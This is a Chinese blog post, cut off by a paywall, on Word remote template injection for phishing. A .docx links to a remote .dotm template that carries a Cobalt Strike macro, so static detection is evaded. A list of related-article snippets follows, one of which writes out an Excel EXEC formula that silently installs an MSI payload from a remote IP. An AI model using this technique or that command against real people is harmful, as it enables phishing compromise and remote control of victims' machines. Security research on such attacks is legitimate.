利用DOCX文档远程模板注入执行宏

最新推荐文章于 2025-05-08 22:30:16 发布
最新推荐文章于 2025-05-08 22:30:16 发布
阅读量2.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: WEB 漏洞复现和分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_zzZ/article/details/102745794

利用DOCX文档远程模板注入执行宏

原理

与传统的宏启用文档相比,这种攻击的好处是多方面的。在对目标执行网络钓鱼攻击时,您可以将.docx的文档直接附加到电子邮件中,并且您不太可能根据文件的拓展名去阻止它。

Word远程模板执行宏就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。
这种攻击更常见的原因是,发送的文档本身是不带恶意代码的,能过很多静态的检测。

环境

两个word文档

  1. 第一个是启用宏的模板,或是.dotm文件,它将包含恶意VBA宏
  2. 第二个是看似没有危害的.docx文件,它本身不包含恶意代码,只有指向恶意模板文件的目标链接
  3. cobalt strike

利用

  1. 直接用的cobalt strike生成的宏代码
  2. 就不啰嗦了
    在这里插入图片描述
  3. 自行测试宏是否生效
    在这里插入图片描述
  4. 生成一个正常的docx文件,
最低0.47元/天 解锁文章
remoteInjector:将远程模板链接注入到Word文档中以进行远程模板注入
05-22
将到远程单词模板的链接注入到Word文档中。 要求 Python3.x或Python2.x 用法 usage: remoteinjector.py [-h] [-w URL] F Inject Template Through Relationship Settings positional arguments: F .docx file to ...
微软企业库学习手册模板.docx
04-17
7. **日志记录和监控**:企业库提供了一套日志记录机制,使得开发者可以轻松地将日志信息记录到不同的目的地,如文件、数据库、远程服务器等,便于应用程序监控和调试。 8. **配置工具和可视化**:为了简化企业库...
利用DOCX文档远程模板注入执行代码
weixin_44922845的博客
04-03 2946
利用DOCX文档远程模板注入执行代码 简介 本地文件中在没有代码的情况下,攻击者可以尝试执行远程文件代码。其中来自APT28的最新样本将此技术展现的淋漓尽致。该样本是docx文件文件内没有任何相关信息,但是打开该文件后,却会弹出经典的“安全警告”。本实验将实现通过远程加载执行代码的攻击方式。 应用场景 该种攻击方式与传统的启用文档相比,这种攻击的好处是多方面的。在对目标执行网络...
Office的远程模板注入的关注点
for_mat_的博客
11-10 285
远程模板注入模板地址位置
Office病毒钓鱼-打点突破
最新发布
Blanks的博客
05-08 701
打点突破之社工钓鱼篇:Office病毒,利用Office的Word文档攻击控制机器
常见的远程代码执行漏洞的注入点和注入方式
just do it
07-29 509
远程文件包含:当应用程序使用用户提供的数据来包含远程文件时,如果没有正确地验证和限制用户提供的输入,攻击者可以通过构造恶意文件路径来执行远程代码。远程命令执行功能:某些应用程序可能提供了远程执行命令的功能,如果没有正确的授权和输入验证,攻击者可以通过构造恶意命令来执行任意的远程代码。命令注入:当应用程序使用用户提供的数据构建系统命令时,如果没有正确地过滤和转义输入数据,攻击者可以通过注入恶意命令来执行远程代码。
实现一个远程模板执行恶意代码
信息安全
11-09 765
文章目录原理实现创建模板创建加载远程文档文件运行总结 原理 word远程模板利用word文档加载附加模板时向远程服务器发起请求而达成攻击的目的,请求并加载远程的恶意模板可用来执行恶意行为 文档本身无恶意代码,内容中只有指向远程服务器地址的url,可以绕过安全软件的静态查杀 实现 创建模板 在这里生成了两种模板,一种是cs生成的后门,一种是测试的弹框代码 使用CS,生成代码 创建一个docx文件,Alt+F11 启动vb编辑器,将代码粘贴进去,另存为dotm文件 测试弹框的代码 创建
RedTeam-钓鱼&文件名反转&office远程模板
qq_45434762的博客
11-28 2058
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
Python实现远程模板链接注入Word文档工具remoteInjector
本工具及其相关知识点介绍了如何使用Python脚本对Word文档进行远程模板注入,展示了Python在处理文件操作时的强大能力。掌握这些知识有助于更好地理解文档安全以及如何保护文档不受到攻击。同时,也强调了在使用此类...
述职报告模板8篇_1.docx
10-08
- **重点培训**: 加强班组长远程培训,举办内训师培训4期,共750人次参加。 - **目标**: 提升员工的专业技能和服务意识,满足企业发展需求。 **1.6 人才选拔与任用** - **岗位竞聘**: 对8个关键岗位实施竞聘上岗。 ...
网络安全之内外网渗透-网络钓鱼技巧
weixin_46626737的博客
06-30 310
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用文件,在通过邮件发。利用生成的代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择,取名,编辑,在编辑弹出的框中加。
Python-PafishMacro是一个启用的Office文档以检测恶意软件分析系统和沙箱
08-10
Pafish Macro 是一个启用的Office文档以检测恶意软件分析系统和沙箱
病毒的研究与实例分析05——无文件携带病毒
鬼手的博客
03-11 1799
文章目录前言远程模板注入执行docx文件格式解析窃取NTLM Hashes小结说明 前言 docx文件可能是病毒吗? 如果你是一周前问笔者这个问题,笔者一定会斩钉截铁的说:”不可能!” 。笔者在之前的文章中提到过,docx中是不含的,所以不可能是病毒。但是,现在笔者却会斩钉截铁的说:”即使没有也可能是病毒!”。 故事要从很久很久以前说起,office文档诞生后不久,就迅速占领各大平台,...
Word模板注入攻击
dda6607的博客
05-16 1082
Word模板注入攻击 0x00 工具准备 phishery:https://github.com/ryhanson/phishery/releases office版本:office 2010 0x01 什么是Word模板注入攻击 Word模板注入攻击就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以...
红队简单钓鱼实战---office
LvHLong的博客
05-30 1677
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office介绍 是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成,当在工作时,就可以直接利用事先编好的自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 病毒是一种常见的计算机病毒,......
远程加载含有恶意代码的word模版文件上线CS
热门推荐
Shanfenglan's blog
08-31 24万+
原理 将直接加载远程带有的恶意模版使用。 缺点 目标主机的网速决定了加载远程模版的速度。有可能文件打开的会特别慢(例如将远程模版放在github),受害者可能在文件打开一半的时候强制关闭word。 优点 因为是远程加载,所以免杀效果十分不错。基本不会被杀毒软件拦截。 实现 第一步:制作一个恶意的模版并确保能够上线 这里以cs的木马为例。 获取到恶意的VB代码后打开word,在工具栏的空白区域右键,点击自定义功能区 勾选开发工具选项。 此时就会出现开发工具这一栏 此时点击Visual basi
钓鱼&文件名反转&office远程模板
qq_50854662的博客
05-29 1818
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关 0x01 件名反转 在渗透过程中,有时需要通过钓鱼来来传播一些木马文件,而这些木马文件需要精心的伪装。RLO即 Start Of Right-to-Left override。我们可以通过选择插入Unicode控制字符RLO来达到反转文件名的效果 以CobaltStrike生成的木马BypassA.
渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四)
qq_34801745的博客
12-17 4269
** 渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四) ** 作者:大余 时间:2020-12-16 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值